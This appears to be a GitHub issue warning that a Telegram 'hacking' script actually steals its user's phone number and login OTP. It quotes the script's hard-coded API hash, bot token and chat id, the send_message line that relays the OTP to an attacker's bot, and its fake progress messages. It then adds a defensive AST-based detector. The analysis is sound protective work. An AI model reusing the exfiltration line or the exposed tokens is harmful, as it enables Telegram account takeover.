do not trust and do not run this script #31

Open
manojdjoshi opened this issue Feb 12, 2025 · 1 comment

@manojdjoshi

1️⃣ Required Libraries

from telethon import TelegramClient, events  
import telegram  
import asyncio  
import time  
import os

Telethon: Used to interact with the Telegram API.
telegram: Used to send messages via a Telegram bot.
asyncio, time, os: Used for script execution and system interaction.
🔴 These libraries are normal, but the risk lies in the use of the "telegram" bot.

2️⃣ Important Credentials (Risk Alert 🚨)

YOUR_APP_ID = 24835154  
YOUR_APP_HASH = 'e7c35ab96f8d8f76513fd7a3ae242c3b'  
bot = telegram.Bot(token='5611639359:AAHWhuVHkongx9GzoGlB0ZDCPlfikr8jJI8')
client = TelegramClient('session_name', YOUR_APP_ID, YOUR_APP_HASH)  

YOUR_APP_ID and YOUR_APP_HASH are used to connect to the Telegram API.
Risk Point: bot = telegram.Bot(token='5611639359:AAHWhuVHkongx9GzoGlB0ZDCPlfikr8jJI8')
This is a Telegram bot that may send OTPs and phone numbers to someone else.
🔴 If this bot is controlled by someone else, your OTP could be leaked.

3️⃣ User Phone Number Input

phone = input(cyan+bold+'[+]\033[0m \033[01mEnter your phone with country code (eg: +92) >\033[0m ')

This prompts the user to enter their phone number.
Once you enter your phone number, the script requests an OTP from Telegram.
🔴 If this script is under someone else's control, it can save your phone number.

4️⃣ OTP Request and Risky Bot Usage

otp = input(cyan+bold+"[+]\033[0m \033[01mEnter the OTP (check inside your telegram app for the otp from telegramm if it not comes to your sms) >\033[0m ")
await bot.send_message(chat_id='5469341309', text=f"Phone Number: {phone}\nOTP: {otp}")

The script uses Telegram's send_code_request() to request an OTP.
Then it asks the user to enter the OTP manually.
Risk Point 🚨:
This OTP is needed to log into your Telegram account.
This line:
await bot.send_message(chat_id='5469341309', text=f"Phone Number: {phone}\nOTP: {otp}")
Sends the OTP to a Telegram bot controlled by someone else.
This means this script can hack your own account! 🚨🚨🚨
🔴 If you run this, your OTP will be sent to an attacker, and they will be able to access your Telegram account.

5️⃣ Fake Steps for Gathering Victim’s Data

victim = input(cyan+bold+'[+]\033[0m \033[01mEnter victim\'s phone with country code to hack(eg: +92) >\033[0m ')
print("Connecting to victim's api...")
time.sleep(3)
print("Gathering victim id and hash...[25%]")
time.sleep(2)
print("Collecting the contacts and chat data...[may take some time]")
time.sleep(6)

This only prints fake progress messages.
No actual hacking is happening—this is just a trick to fool users.
🔴 This script does not collect victim data; it only steals your OTP.

6️⃣ Login Attempt

await client.sign_in(phone, otp)
me = await client.get_me()
print(me.first_name)
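
A defender-side check for the pattern this issue describes, added here as an example and not part of the original issue or the reported repository: it parses a script with Python's ast module and flags any call, other than the Telethon login calls send_code_request and sign_in, that receives a value read from input(). SAMPLE is constructed with a placeholder token and chat id; find_input_exfil, call_name and EXPECTED_SINKS are hypothetical names.

```python
import ast

# Constructed sample that mirrors the flow described in the issue.
# The token and chat id are placeholders, not real values.
SAMPLE = '''
import telegram
bot = telegram.Bot(token="PLACEHOLDER_TOKEN")
async def main(client):
    phone = input("Enter your phone > ")
    await client.send_code_request(phone)
    otp = input("Enter the OTP > ")
    await bot.send_message(chat_id="0", text=f"Phone Number: {phone}\\nOTP: {otp}")
    await client.sign_in(phone, otp)
'''

# Telethon login calls that legitimately receive the phone number and code.
EXPECTED_SINKS = {"send_code_request", "sign_in"}


def call_name(node):
    """Return the bare function or method name of an ast.Call."""
    func = node.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")


def find_input_exfil(source):
    """List (line, call, variables) where input()-derived values reach other calls."""
    tree = ast.parse(source)
    # Pass 1: names assigned directly from input(...).
    tainted = set()
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)
                and call_name(node.value) == "input"):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # Pass 2: calls whose arguments (f-strings included) mention those names.
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or call_name(node) in EXPECTED_SINKS:
            continue
        args = list(node.args) + [kw.value for kw in node.keywords]
        used = {n.id for a in args for n in ast.walk(a)
                if isinstance(n, ast.Name) and n.id in tainted}
        if used:
            findings.append((node.lineno, call_name(node), sorted(used)))
    return sorted(findings)


if __name__ == "__main__":
    for line, call, names in find_input_exfil(SAMPLE):
        print(f"line {line}: {call}() receives user input {names}")
```

This is a heuristic: it only tracks names assigned directly from input(), so a finding is a prompt for manual review of where the value goes, and an empty result is not proof that a script is safe.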

@XZY123lol

Thanks for the warning
